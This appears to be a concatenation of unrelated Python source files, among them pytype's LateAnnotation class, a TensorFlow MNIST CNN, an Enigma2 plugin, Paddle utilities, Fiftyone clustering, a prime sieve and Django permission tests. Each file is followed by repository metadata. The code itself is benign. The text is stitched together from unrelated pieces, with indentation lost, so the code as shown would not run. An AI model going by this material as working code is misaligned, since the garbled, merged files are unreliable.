new_options = [option.get_formal_type_parameter(t)
for option in self.options]
return Union(new_options, self.ctx)
def get_inner_types(self):
return enumerate(self.options)
def update_inner_type(self, key, typ):
self.options[key] = typ
def replace(self, inner_types):
return self.__class__((v for _, v in sorted(inner_types)), self.ctx)
class LateAnnotation:
"""A late annotation.
A late annotation stores a string expression and a snapshot of the VM stack at
the point where the annotation was introduced. Once the expression is
resolved, the annotation pretends to be the resolved type; before that, it
pretends to be an unsolvable. This effect is achieved by delegating attribute
lookup with __getattribute__.
Note that for late annotation x, `isinstance(x, ...)` and `x.__class__` will
use the type that x is pretending to be; `type(x)` will reveal x's true type.
Use `x.is_late_annotation()` to check whether x is a late annotation.
"""
_RESOLVING = object()
def __init__(self, expr, stack, ctx, *, typing_imports=None):
self.expr = expr
self.stack = stack
self.ctx = ctx
self.resolved = False
# Any new typing imports the annotation needs while resolving.
self._typing_imports = typing_imports or set()
self._type = ctx.convert.unsolvable # the resolved type of `expr`
self._unresolved_instances = set()
self._resolved_instances = {}
# _attribute_names needs to be defined last! This contains the names of all
# of LateAnnotation's attributes, discovered by looking at
# LateAnnotation.__dict__ and self.__dict__. These names are used in
# __getattribute__ and __setattr__ to determine whether a given get/setattr
# call should operate on the LateAnnotation itself or its resolved type.
self._attribute_names = (
set(LateAnnotation.__dict__) |
set(super().__getattribute__("__dict__")))
def flatten_expr(self):
"""Flattens the expression into a legal variable name if necessary.
Pytype stores parameterized recursive types in intermediate variables. If
self is such a type, this method flattens self.expr into a string that can
serve as a variable name. For example, 'MyRecursiveAlias[int, str]' is
flattened into '_MyRecursiveAlias_LBAR_int_COMMA_str_RBAR'.
Returns:
If self is a parameterized recursive type, a flattened version of
self.expr that is a legal variable name. Otherwise, self.expr unchanged.
"""
if "[" in self.expr and self.is_recursive():
# _DOT and _RBAR have no trailing underscore because they precede names
# that we already prefix an underscore to.
return "_" + self.expr.replace(".", "_DOT").replace(
"[", "_LBAR_").replace("]", "_RBAR").replace(", ", "_COMMA_")
return self.expr
def unflatten_expr(self):
"""Unflattens a flattened expression."""
if "_LBAR_" in self.expr:
mod, dot, rest = self.expr.rpartition(".")
# The [1:] slicing and trailing underscore in _DOT_ are to get rid of
# leading underscores added when flattening.
return mod + dot + rest[1:].replace("_DOT_", ".").replace(
"_LBAR_", "[").replace("_RBAR", "]").replace("_COMMA_", ", ")
return self.expr
def __repr__(self):
return "LateAnnotation({!r}, resolved={!r})".format(
self.expr, self._type if self.resolved else None)
# __hash__ and __eq__ need to be explicitly defined for Python to use them in
# set/dict comparisons.
def __hash__(self):
return hash(self._type) if self.resolved else hash(self.expr)
def __eq__(self, other):
return hash(self) == hash(other)
def __getattribute__(self, name):
# We use super().__getattribute__ directly for attribute access to avoid a
# performance penalty from this function recursively calling itself.
get = super().__getattribute__
if name == "_attribute_names" or name in get("_attribute_names"):
return get(name)
return get("_type").__getattribute__(name) # pytype: disable=attribute-error
def __setattr__(self, name, value):
if not hasattr(self, "_attribute_names") or name in self._attribute_names:
return super().__setattr__(name, value)
return self._type.__setattr__(name, value)
def resolve(self, node, f_globals, f_locals):
"""Resolve the late annotation."""
if self.resolved:
return
# Sets resolved to a truthy value distinguishable from True so that
# 'if self.resolved' is True when self is partially resolved, but code that
# really needs to tell partially and fully resolved apart can do so.
self.resolved = LateAnnotation._RESOLVING
# Add implicit imports for typing, since we can have late annotations like
# `set[int]` which get converted to `typing.Set[int]`.
if self._typing_imports:
overlay = self.ctx.vm.import_module("typing", "typing", 0)
for v in self._typing_imports:
if v not in f_globals.members:
f_globals.members[v] = overlay.get_module(v).load_lazy_attribute(v)
var, errorlog = abstract_utils.eval_expr(self.ctx, node, f_globals,
f_locals, self.expr)
if errorlog:
self.ctx.errorlog.copy_from(errorlog.errors, self.stack)
self._type = self.ctx.annotation_utils.extract_annotation(
node, var, None, self.stack)
if self._type != self.ctx.convert.unsolvable:
# We may have tried to call __init__ on instances of this annotation.
# Since the annotation was unresolved at the time, we need to call
# __init__ again to define any instance attributes.
for instance in self._unresolved_instances:
if isinstance(instance.cls, Union):
# Having instance.cls be a Union type will crash in attribute.py.
# Setting it to Any picks up the annotation in another code path.
instance.cls = self.ctx.convert.unsolvable
else:
self.ctx.vm.reinitialize_if_initialized(node, instance)
self.resolved = True
log.info("Resolved late annotation %r to %r", self.expr, self._type)
def set_type(self, typ):
# Used by annotation_utils.sub_one_annotation to substitute values into
# recursive aliases.
assert not self.resolved
self.resolved = True
self._type = typ
def to_variable(self, node):
if self.resolved:
return self._type.to_variable(node)
else:
return _base.BaseValue.to_variable(self, node) # pytype: disable=wrong-arg-types
def instantiate(self, node, container=None):
"""Instantiate the pointed-to class, or record a placeholder instance."""
if self.resolved:
key = (node, _get_container_type_key(container))
if key not in self._resolved_instances:
self._resolved_instances[key] = self._type.instantiate(node, container)
return self._resolved_instances[key]
else:
instance = _instance_base.Instance(self, self.ctx)
self._unresolved_instances.add(instance)
return instance.to_variable(node)
def get_special_attribute(self, node, name, valself):
if name == "__getitem__" and not self.resolved:
container = _base.BaseValue.to_annotation_container(self) # pytype: disable=wrong-arg-types
return container.get_special_attribute(node, name, valself)
return self._type.get_special_attribute(node, name, valself)
def is_late_annotation(self):
return True
def is_recursive(self):
"""Check whether this is a recursive type."""
if not self.resolved:
return False
seen = {id(self)}
stack = [self._type]
while stack:
t = stack.pop()
if t.is_late_annotation():
if id(t) in seen:
return True
seen.add(id(t))
if isinstance(t, mixin.NestedAnnotation):
stack.extend(child for _, child in t.get_inner_types())
return False
class FinalAnnotation(_base.BaseValue):
"""Container for a Final annotation."""
def __init__(self, annotation, ctx):
super().__init__("FinalAnnotation", ctx)
self.annotation = annotation
def __repr__(self):
return f"Final[{self.annotation}]"
def instantiate(self, node, container=None):
return self.to_variable(node)
| google/pytype | pytype/abstract/_typing.py | _typing.py | py | 31,975 | python | en | code | 4,405 | github-code | 36 |
16152684320 | class ArrayOperations:
def getArray(self):
global size
arr=[]
for i in range(size):
print("Enter array number ",i+1)
temp=[]
for j in range(size):
temp.append(int(input("Enter each element followed by the return key")))
arr.append(temp)
return arr
def addArray(self,arr1,arr2):
for i in range(size):
global result
resultTemp=[]
for j in range(size):
resultTemp.append(arr1[i][j]+arr2[i][j])
result.append(resultTemp)
def displayArray(self,res):
global size
for i in range(size):
for x in res[i]:
print(x,end=" ")
print()
size=int(input("Enter the size of the array"))
obj=ArrayOperations()
arr1=obj.getArray()
arr2=obj.getArray()
result=[]
obj.addArray(arr1,arr2)
obj.displayArray(result) | siva5271/week3_assignments | q19.py | q19.py | py | 925 | python | en | code | 0 | github-code | 36 |
74330831463 | from Components.config import config
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Tools.Log import Log
from Tools.LoadPixmap import LoadPixmap
from Tools.Directories import resolveFilename, SCOPE_SKIN
class RemoteControlSelection(Screen):
SKIN_DEFAULT = "skin_default"
skin = """
<screen name="RemoteControlSelection" position="center,80" size="420,610" title="RemoteControlSelection" >
<widget name="rc" pixmap="skin_default/rc0.png" position="20,10" size="380,500" alphatest="on"/>
<widget name="color_hint" position="10,520" size="400,50" font="Regular;18" halign="center" valign="center" backgroundColor="background" transparent="0" />
<widget name="ok" position="10,580" size="400,24" font="Regular;22" halign="center" valign="center" backgroundColor="background" transparent="0" />
</screen>
"""
def __init__(self, session):
Screen.__init__(self, session)
self["color_hint"] = Label(_("Some Remotes may exist in other Colors"))
self["ok"] = Label(_("Press OK to apply"))
self._pixmap = Pixmap()
self["rc"] = self._pixmap
self["actions"] = ActionMap(["DirectionActions", "OkCancelActions"],
{
"ok": self._ok,
"cancel": self._cancel,
"right": self._next,
"left": self._prev,
})
self._pixmaps = []
for i in (0, 1, 2, 3):
self._pixmaps.append(
LoadPixmap(
resolveFilename(SCOPE_SKIN, "skin_default/rc%s.png" % (i))
)
)
self._index = -1
self.onFirstExecBegin.append(self._firstExecBegin)
def _firstExecBegin(self):
self.setTitle(_("Select your Remote"))
self.setCurrentPixmap(config.misc.rcused.value)
def _ok(self):
config.misc.rcused.value = self._index
config.misc.rcused.save()
Log.i("RC is now set to Model %s" %(config.misc.rcused.value))
self.close()
def _cancel(self):
self.close()
def setCurrentPixmap(self, index):
if index > 3:
index = 0
if index < 0:
index = 3
self._index = index
self._pixmap.setPixmap(self._pixmaps[index])
def _next(self):
self._pixmap.setShowHideAnimation("slide_right_to_left")
self.setCurrentPixmap(self._index + 1)
def _prev(self):
self._pixmap.setShowHideAnimation("slide_left_to_right")
self.setCurrentPixmap(self._index - 1)
def remoteControlSelectionRun(session, **kwargs):
session.open(RemoteControlSelection)
def remoteControlSelectionMenu(menuid, **kwargs):
if menuid == "devices":
return [(_("Remote Control Selection"), remoteControlSelectionRun, "rcu_selection", None)]
else:
return []
def Plugins(**kwargs):
return PluginDescriptor(name=_("Remote Control Selection"), description=_("Select the remote you're using"), where=PluginDescriptor.WHERE_MENU, needsRestart=False, fnc=remoteControlSelectionMenu)
| opendreambox/enigma2 | usr/lib/enigma2/python/Plugins/SystemPlugins/RemoteControlSelection/plugin.py | plugin.py | py | 2,851 | python | en | code | 1 | github-code | 36 |
4778562539 | from typing import Optional, Tuple, Union
import paddle
import paddle.nn.functional as F
def cast_if_needed(tensor: Union[paddle.Tensor, None],
dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
"""Cast tensor to dtype"""
return tensor if tensor is None or tensor.dtype == dtype else paddle.cast(tensor, dtype)
def cast_if_needed_inplace(tensor: Union[paddle.Tensor, None],
dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
"""Cast tensor to dtype (inplace), not to be used on layer inputs"""
return tensor if tensor is None or tensor.dtype == dtype else tensor._to(dtype=dtype)
def check_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> bool:
"""For fp8 fprop (TN layout), inputs and weights must be such
that dim0 is divisible by 8 and dim1 is divisible by 16.
"""
return not tensor.shape[0] % 8 and not tensor.shape[1] % 16
def assert_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> None:
"""For fp8 fprop (TN layout), inputs and weights must be such
that dim0 is divisible by 8 and dim1 is divisible by 16.
"""
# single tensor check so it's clear which tensor is triggering the assertion
assert check_dim_for_fp8_forward_exec(tensor), (
"Tensor dimensions are not compatible for FP8 execution: "
f"({tensor.shape[0]} % 8 != 0, {tensor.shape[1]} % 16 != 0)")
def get_bias_dtype(activation_dtype: paddle.dtype):
"""Get bias dtype given activation_dtype"""
return paddle.bfloat16 if activation_dtype == paddle.float32 else activation_dtype
def get_paddle_act_func(activation):
"""Get paddle activation function"""
funcs = {
'gelu': F.gelu,
'relu': F.relu,
}
if activation not in funcs:
raise "Activation type " + activation + " is not supported."
return funcs[activation]
def attention_mask_func(attention_scores: paddle.Tensor,
attention_mask: paddle.Tensor) -> paddle.Tensor:
"""Get attention mask"""
def _masked_fill(x, mask, value):
y = paddle.full(x.shape, value, x.dtype)
return paddle.where(mask, y, x)
attention_scores = _masked_fill(attention_scores, attention_mask, -10000.0)
return attention_scores
def mask_to_cu_seqlens(mask: paddle.Tensor, need_kv: bool = False) -> paddle.Tensor:
"""Convert mask to cu_seqlens"""
assert 'bool' in str(mask.dtype), "mask must be bool dtype"
assert len(mask.shape) == 4 and mask.shape[1] == 1, "mask must be [b, 1, s_q, s_kv]"
q_actual_seqlens = paddle.sum(mask[:, :, :, 0] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
q_cu_seqlens = paddle.cumsum(q_actual_seqlens)
q_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), q_cu_seqlens], axis=0)
if not need_kv:
return q_cu_seqlens, None
kv_actual_seqlens = paddle.sum(mask[:, :, 0, :] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
kv_cu_seqlens = paddle.cumsum(kv_actual_seqlens)
kv_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), kv_cu_seqlens], axis=0)
return q_cu_seqlens, kv_cu_seqlens
def divide(numerator: int, denominator: int) -> int:
"""Ensure that numerator is divisible by the denominator and return
the division value."""
assert (numerator % denominator == 0), f"{numerator} is not divisible by {denominator}"
return numerator // denominator
def save_for_backward_allow_none(ctx, *args) -> None:
"""Save tensors for backward. Args could be None"""
indices_mapping = []
tensors_to_save = []
for x in args:
if isinstance(x, paddle.Tensor):
indices_mapping.append(len(tensors_to_save))
tensors_to_save.append(x)
elif x is None:
indices_mapping.append(-1)
else:
raise ValueError(f"Type {type(x)} is not allowed.")
ctx._indices_mapping = indices_mapping
ctx.save_for_backward(*tensors_to_save)
def saved_tensor_allow_none(ctx) -> Tuple[Optional[paddle.Tensor]]:
"""Used with `save_for_backward_allow_none` in pair. Get saved tensors from ctx."""
assert hasattr(ctx, '_indices_mapping'), "`saved_tensor_allow_none` must be used " \
"with `save_for_backward_allow_none` in pair."
indices_mapping = ctx._indices_mapping
outputs = []
saved_tensors = ctx.saved_tensor()
for index in indices_mapping:
if index < 0:
outputs.append(None)
else:
outputs.append(saved_tensors[index])
return tuple(outputs)
| NVIDIA/TransformerEngine | transformer_engine/paddle/utils.py | utils.py | py | 4,609 | python | en | code | 1,056 | github-code | 36 |
27890676766 | # -*- coding: utf-8 -*-
import tensorflow as tf
import tensorflow.examples.tutorials.mnist.input_data as input_data
import pdb
def weight_variable(shape):
"初始化权重"
initial = tf.truncated_normal(shape,stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"初始化偏置项"
initial = tf.constant(.1,shape=shape)
return tf.Variable(initial)
def conv2d(x,W):
"1步长,0边距的卷积"
return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding="SAME")
def max_pool_2x2(x):
"2x2的池化操作"
return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding="SAME")
if __name__ == "__main__":
x = tf.placeholder("float", shape=[None, 784])
y_ = tf.placeholder("float", shape=[None, 10])
mnist = input_data.read_data_sets("MNIST_data",one_hot=True)
sess = tf.InteractiveSession()
# create CNN
W_conv1 = weight_variable([5,5,1,32]) # 32个卷积核
b_conv1 = bias_variable([32])
x_image = tf.reshape(x,[-1,28,28,1])
h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1)+b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5,5,32,64]) # 64个卷积核
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2)+b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
W_fc1 = weight_variable([7*7*64,1024]) # 图片尺寸减小为 7x7, 输入channel为 64,输入总数为 7x7x64???? 前面的padding 用的same, 这里图片大小应该还是28x28??
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1)+b_fc1)
keep_prob = tf.placeholder("float")
h_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop,W_fc2)+b_fc2)
cross_entropy = -tf.reduce_sum(y_*tf.log(y_conv))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1),tf.argmax(y_,1))
accuarcy = tf.reduce_mean(tf.cast(correct_prediction,"float"))
sess.run(tf.initialize_all_variables())
for i in range(500):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuarcy.eval(feed_dict={x:batch[0],y_:batch[1],keep_prob:1.0})
print("step %d, trainning accuarcy %g"%(i,train_accuracy))
train_step.run(feed_dict={x:batch[0],y_:batch[1],keep_prob:0.5})
print("test accuarcy %g"%accuarcy.eval(feed_dict={
x:mnist.test.images,y_:mnist.test.labels,keep_prob:1.0}))
pdb.set_trace()
| RyanWangZf/Tensorflow_Tutorial | Others/simple_CNN.py | simple_CNN.py | py | 2,840 | python | en | code | 0 | github-code | 36 |
71930911465 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 20:17:37 2017
@author: afranio
"""
import numpy as np
import matplotlib.pyplot as plt
# dados experimentais
# benzeno - pressao de vapor X temperatura
P = np.array([ 1, 5, 10, 20, 40, 60, 100, 200, 400, 760]) # mmHg
T = np.array([-36.7, -19.6, -11.5, -2.6, 7.6, 15.4, 26.1, 42.2, 60.6, 80.1]) # C
# grau do polinomio a ser ajustado
n = 4
# ajustar o polinomio
c = np.polyfit(T,P,n)
# avaliando o polinomio para cada T (comparar com os dados experimentais)
z = np.polyval(c,T)
# dominio de T ''continuo'' (para plotar a correlacao)
Tc = np.arange(-37,81.1,0.1)
plt.plot(Tc,c[4]+c[3]*Tc+c[2]*Tc**2+c[1]*Tc**3+c[0]*Tc**4,'-',T,P,'*')
plt.title('Pressao de vapor benzeno - ajustada com polinomio de quarto grau')
plt.xlabel('T (C)')
plt.ylabel('P (mm Hg)')
| afraniomelo/curso-matlab | codigos/python/ajuste_polinomio.py | ajuste_polinomio.py | py | 887 | python | pt | code | 0 | github-code | 36 |
1408640826 | import sys
import csv
csv_file_name = sys.argv[1] # Name of the file to parse
column_table_index = sys.argv[2] # The column which should be used as an index
column_table_index_base = int(sys.argv[3]) # The base of that column (i.e. base 16, base 10, base 2) expressed in base 10
column_table_value = sys.argv[4] # The column which should be used as a value
delimiter_ascii = str(chr(int(sys.argv[5]))) # The delimiter between each column
table_entry_count = int(sys.argv[6]) # Base 10 length of the array aligned to the nearest power of 2
value_data_type = str(sys.argv[7]) # The type of the array "int", "string", etc...
with open(csv_file_name, newline='') as csv_file:
spam_reader = csv.reader(csv_file, delimiter=delimiter_ascii)
idx_col_index = 0
idx_col_value = 0
for row in spam_reader:
idx_col_index = row.index(column_table_index)
idx_col_value = row.index(column_table_value)
break
row_count = 0
a_table = [0] * table_entry_count
print(column_table_index,":",column_table_value)
for row in spam_reader:
a_table[int(row[idx_col_index], base=column_table_index_base)] = row[idx_col_value]
print(row[idx_col_index],":",row[idx_col_value])
row_count += 1
print(row_count,"rows")
if (value_data_type == "int"):
print("int array[] = { ")
array_str = ""
for i in range(table_entry_count):
array_str += str(a_table[i])
array_str += ','
if (i != table_entry_count - 1):
array_str += ' '
print(array_str)
print("};")
| awewsomegamer/PyotorComputer | tools/csv2array.py | csv2array.py | py | 1,855 | python | en | code | 2 | github-code | 36 |
70631449384 | from unittest import TestCase
from set_matrix_zeroes import Solution
class TestSolution(TestCase):
def test_set_zeroes(self):
inputs = (
[[1, 1, 1], [1, 0, 1], [1, 1, 1]],
[[0, 1, 2, 0], [3, 4, 5, 2], [1, 3, 1, 5]]
)
outs = (
[[1, 0, 1], [0, 0, 0], [1, 0, 1]],
[[0, 0, 0, 0], [0, 4, 5, 0], [0, 3, 1, 0]]
)
for inp, out in zip(inputs, outs):
Solution().setZeroes(inp)
self.assertEqual(out, inp)
| sswest/leetcode | 73_set_matrix_zeroes/test_set_matrix_zeroes.py | test_set_matrix_zeroes.py | py | 512 | python | en | code | 0 | github-code | 36 |
12526381398 | from PIL import ImageGrab,Image
import pytesseract
def yz_code():
# bbox = (1348, 423, 1455, 455) # 截图范围,这个取决你验证码的位置
# img = ImageGrab.grab(bbox=bbox)
# img.save("D:\\py\\login\\image_code.jpg") # 设置路径
# img.show()
img = Image.open('img5.bmp') # PIL库加载图片
# print img.format, img.size, img.mode # 打印图片信息
img = img.convert('RGBA') # 转换为RGBA
pix = img.load() # 读取为像素
for x in range(img.size[0]): # 处理上下黑边框
pix[x, 0] = pix[x, img.size[1] - 1] = (255, 255, 255, 255)
for y in range(img.size[1]): # 处理左右黑边框
pix[0, y] = pix[img.size[0] - 1, y] = (255, 255, 255, 255)
for y in range(img.size[1]): # 二值化处理,这个阈值为R=95,G=95,B=95
for x in range(img.size[0]):
if pix[x, y][0] < 95 or pix[x, y][1] < 95 or pix[x, y][2] < 95:
pix[x, y] = (0, 0, 0, 255)
else:
pix[x, y] = (255, 255, 255, 255)
img.save("img5.png") # 由于tesseract限制,这里必须存到本地文件
image_temp = Image.open('img5.png')
signin_code = pytesseract.image_to_string(image_temp,lang='eng')
print(signin_code)
yz_code()
| SuneastChen/other_python_demo | 其他实例/验证码识别/图片处理1_pytesseract识别.py | 图片处理1_pytesseract识别.py | py | 1,285 | python | en | code | 0 | github-code | 36 |
26498800829 | import requests
import json
import numpy as np
import cv2
import os
from tqdm import tqdm
def crop_receipt(raw_img):
"""Crop receipt from a raw image captured by phone
Args:
raw_img ([np.array]): Raw image containing receipt
Returns:
cropped_receipt ([np.array]): The image of cropped receipt
"""
CROP_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_detect'
ROTATE_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_rotate90/'
_, img_encoded = cv2.imencode('.jpg', raw_img)
detect_receipt = requests.post(CROP_RECEIPT_URL, files={"file": (
"filename", img_encoded.tostring(), "image/jpeg")}).json()
receipt_box = detect_receipt['receipt']
if receipt_box is not None:
crop = raw_img[receipt_box[1]:receipt_box[3], receipt_box[0]:receipt_box[2]]
img_crop_request = cv2.imencode('.jpg', crop)[1]
files = [
('img', img_crop_request.tostring())
]
rotated_func = requests.request("POST", "http://service.aiclub.cs.uit.edu.vn/receipt/ript_rotate90/", files=files).text
rotated_func = rotated_func.split('\n')
if rotated_func[0] != 'None' and float(rotated_func[1]) > 0.6:
dic_rotate_fuc = {'ROTATE_90_CLOCKWISE':cv2.ROTATE_90_CLOCKWISE, 'ROTATE_90_COUNTERCLOCKWISE':cv2.ROTATE_90_COUNTERCLOCKWISE, 'ROTATE_180':cv2.ROTATE_180}
crop = cv2.rotate(crop, dic_rotate_fuc[rotated_func[0]])
return crop
return raw_img | tiendv/MCOCR2021 | Task1/cropper.py | cropper.py | py | 1,516 | python | en | code | 9 | github-code | 36 |
73060543145 | from tutelary.models import (
PermissionSet, Policy, PolicyInstance
)
from django.contrib.auth.models import User
import pytest
from .factories import UserFactory, PolicyFactory
from .datadir import datadir # noqa
from .settings import DEBUG
@pytest.fixture(scope="function") # noqa
def setup(datadir, db):
user1 = UserFactory.create(username='user1')
user2 = UserFactory.create(username='user2')
user3 = UserFactory.create(username='user3')
PolicyFactory.set_directory(str(datadir))
def_pol = PolicyFactory.create(name='def', file='default-policy.json')
org_pol = PolicyFactory.create(name='org', file='org-policy.json')
prj_pol = PolicyFactory.create(name='prj', file='project-policy.json')
user1.assign_policies(def_pol)
user2.assign_policies(def_pol,
(org_pol, {'organisation': 'Cadasta'}))
user3.assign_policies(def_pol,
(org_pol, {'organisation': 'Cadasta'}),
(prj_pol, {'organisation': 'Cadasta',
'project': 'TestProj'}))
return (user1, user2, user3, def_pol, org_pol, prj_pol)
@pytest.fixture(scope="function") # noqa
def debug(db):
def fn(s):
print(s)
psets = PermissionSet.objects.all()
print('PSets:', list(map(
lambda pset: str(pset.pk) + ': ' + repr(pset.tree()),
psets)
))
pis = PolicyInstance.objects.all()
print('PolInsts:', list(map(lambda pi:
str(pi.pk) + ': ' + str(pi.pset.id) + ' ' +
pi.policy.name + ' ' +
str(pi.variables), pis)))
def nofn(s):
pass
if DEBUG:
return fn
else:
return nofn
def check(nuser=None, npol=None, npolin=None, npset=None):
if nuser is not None:
assert User.objects.count() == nuser
if npol is not None:
assert Policy.objects.count() == npol
if npolin is not None:
assert PolicyInstance.objects.count() == npolin
if npset is not None:
assert PermissionSet.objects.count() == npset
@pytest.mark.django_db # noqa
def test_permission_set_creation(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('CREATION')
check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_change(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user2.assign_policies(def_pol,
(org_pol, {'organisation': 'DummyCorp'}))
debug('AFTER')
check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_clear_all(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.assign_policies()
user2.assign_policies()
user3.assign_policies()
debug('AFTER')
# Remember the empty permission set!
check(nuser=3, npol=3, npolin=0, npset=1)
@pytest.mark.django_db # noqa
def test_permission_set_clear_single(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.assign_policies()
debug('AFTER')
# Remember the empty permission set!
check(nuser=3, npol=3, npolin=5, npset=3)
@pytest.mark.django_db # noqa
def test_permission_user_deletion_single(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user3.delete()
debug('AFTER')
# No empty permission set here: the user is gone!
check(nuser=2, npol=3, npolin=3, npset=2)
@pytest.mark.django_db # noqa
def test_permission_user_deletion_all(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.delete()
user2.delete()
user3.delete()
debug('AFTER')
# No empty permission set here: the users are gone!
check(nuser=0, npol=3, npolin=0, npset=0)
| Cadasta/django-tutelary | tests/test_integrity.py | test_integrity.py | py | 4,068 | python | en | code | 6 | github-code | 36 |
71202438503 | # -*- coding: utf-8 -*-
# @Author: Luis Condados
# @Date: 2023-09-09 18:46:06
# @Last Modified by: Luis Condados
# @Last Modified time: 2023-09-16 18:33:43
import fiftyone as fo
import fiftyone.zoo as foz
import fiftyone.brain as fob
from sklearn.cluster import KMeans
import click
import logging
logging.basicConfig(level=logging.INFO)
def create_dataset_from_dir(images_dir, name=None, persistent=False):
dataset = fo.Dataset.from_images_dir(images_dir=images_dir,
name=name,
persistent=persistent,
recursive=True)
return dataset
@click.command()
@click.option('--images_dir', '-i')
@click.option('--dataset_name', '--name', '-n')
@click.option('--persistent', '-p', type=bool, default=True, is_flag=True)
@click.option('--n_clusters', default=None, type=int)
def main(images_dir, dataset_name, persistent, n_clusters):
if fo.dataset_exists(dataset_name):
logging.info('Dataset {} already exists.'.format(dataset_name))
dataset = fo.load_dataset(dataset_name)
else:
dataset = create_dataset_from_dir(images_dir, dataset_name)
dataset.persistent = persistent
####################
# Compute embeddings
####################
logging.info('Computing embedding ...')
#TIP: run foz.list_zoo_models() to see the whole list of models
# model = foz.load_zoo_model("mobilenet-v2-imagenet-torch")
model = foz.load_zoo_model('clip-vit-base32-torch')
embeddings = dataset.compute_embeddings(model)
logging.info('Working on the 2D for visualization ...')
# Image embeddings
fob.compute_visualization(dataset,
brain_key="latent_space",
embeddings=embeddings,
)
# to enable the "search for similarity" feature
fob.compute_similarity(dataset, embeddings=embeddings)
####################
# K-means Clustering
####################
if n_clusters != None:
logging.info('Computing k-means clustering ...')
k_means = KMeans(init="k-means++", n_clusters=n_clusters, n_init=10)
k_means.fit(embeddings)
for i, sample in enumerate(dataset):
cluster_id = k_means.labels_[i]
sample['cluster_id'] = cluster_id
sample.save()
################
# Launch the App
################
session = fo.launch_app(dataset)
# Blocks execution until the App is closed
session.wait()
if __name__ == "__main__":
main() | Gabriellgpc/exploratory_image_data_analysis | workspace/demo.py | demo.py | py | 2,617 | python | en | code | 0 | github-code | 36 |
22833245357 | import math
def isPrime(n):
i = 2
while(i<=math.sqrt(n)):
if(n%i==0):
return False
else:
i += 1
return True
def sieve(n):
p_n = {}
for i in range(2,n):
p_n[i] = True
for j in range(2,n):
if p_n[j] == True:
for a in range(2*j,n,j):
p_n[a] = False
return p_n
if __name__ == "__main__":
# n = int(input("Enter number to check for primality: "))
# if(isPrime(n)):
# print("{} is a Prime Number.".format(n))
# else:
# print("{} is not a Prime Number.".format(n))
test = sieve(2000000)
n = int(input("Enter n < 2000000 to check for primality:"))
print("{} is".format(n),end=" ")
if not test[n]: print("not", end = " ")
print("prime.")
| joshuanazareth97/Project-Euler | Prime.py | Prime.py | py | 788 | python | en | code | 0 | github-code | 36 |
73485134183 | # https://programmers.co.kr/learn/courses/30/lessons/42897
def solution(money):
stole0_pprev = stole0_prev = money[0]
stole1_pprev, stole1_prev = 0, money[1]
for m in money[2:]:
stole0_pprev, stole0_prev = stole0_prev, max(stole0_prev, stole0_pprev + m)
stole1_pprev, stole1_prev = stole1_prev, max(stole1_prev, stole1_pprev + m)
return max(stole0_pprev, stole1_prev) | lexiconium/algorithms | programmers/dp/theft_light.py | theft_light.py | py | 405 | python | en | code | 0 | github-code | 36 |
73050884903 | """....."""
brick_height = int(input('brick_height = '))
brick_width = int(input('brick_width = '))
brick_depth = int(input('brick_depth = '))
hole_height = int(input('hole_height = '))
hole_width = int(input('hole_width = '))
# Find two minimum dimensions of the hole
hole_min_0 = min(hole_width, hole_height)
hole_min_1 = max(hole_width, hole_height)
# Find two minimum dimensions of the brick
brick_max = max(brick_depth, brick_width, brick_height)
if brick_height == brick_max:
x = brick_width
y = brick_depth
elif brick_width == brick_max:
x = brick_height
y = brick_depth
else:
x = brick_width
y = brick_height
brick_min_0 = min(x, y)
brick_min_1 = max(x, y)
# Check if the brick can be passed into the hole
if brick_min_0 <= hole_min_0 and brick_min_1 <= hole_min_1:
print("YES")
else:
print("NO")
# brick_params = sorted([brick_width, brick_height, brick_depth]) # 2, 3, 4
# hole_params = sorted([hole_height, hole_width]) # 3, 2
#
# if brick_params[0] <= hole_params[0] and brick_params[1] <= hole_params[1]:
# print('YES')
# else:
# print('NO')
| ave2407/CourseraPythonProjects | week2/if/if_castle.py | if_castle.py | py | 1,102 | python | en | code | 0 | github-code | 36 |
8694387627 | import pandas as pd
import numpy as np
import os
from datetime import timedelta
import math
pd.set_option('display.width', 1200)
pd.set_option('precision', 3)
np.set_printoptions(precision=3)
